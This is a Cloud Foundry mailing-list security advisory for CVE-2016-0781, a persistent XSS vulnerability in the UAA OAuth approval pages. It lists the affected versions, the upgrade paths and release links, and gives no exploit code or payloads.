[SECURITY][LOW] CVE-2016-0781 UAA Persistent XSS Vulnerability

Chip Childers <cchilders@...>

CVE-2016-0781 UAA Persistent XSS VulnerabilitySeverity


Cloud Foundry Foundation
Versions Affected

Cloud Foundry v208 through v231

Login-server v1.6 - v1.14

UAA v2.0.0 - v2.7.4.1 & v3.0.0 - v3.2.0

UAA-Release v2 - v7

The UAA OAuth approval pages are vulnerable to an XSS attack by specifying
malicious java script content in either the OAuth scopes (SCIM groups) or
SCIM group descriptions.

OSS users are strongly encouraged to follow one of the mitigations below:


Upgrade to Cloud Foundry v233 [1] or later

For standalone UAA users

For users using UAA Version 3.0.0, please upgrade to UAA Release to
v3.2.1 [3] or later

For users using standalone UAA Version 2.X.X, please upgrade to UAA
Release to v2.7.4.2 [2] or v3.2.1 [3]

For users using standalone login-server 1.X, please upgrade to UAA
Release to v2.7.4.2 [2] or v3.2.1 [3]

For users using UAA-Release (UAA bosh release), please upgrade to
UAA-Release v8 [4]


Discovered by the GE Digital Security Team

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v233

[2] https://github.com/cloudfoundry/uaa/releases/tag/

[3] https://github.com/cloudfoundry/uaa/releases/tag/3.2.1

[4] https://github.com/cloudfoundry/uaa-release/releases/tag/v8


2016-Mar-XX: Initial vulnerability report published

Join {cf-dev@lists.cloudfoundry.org to automatically receive all group messages.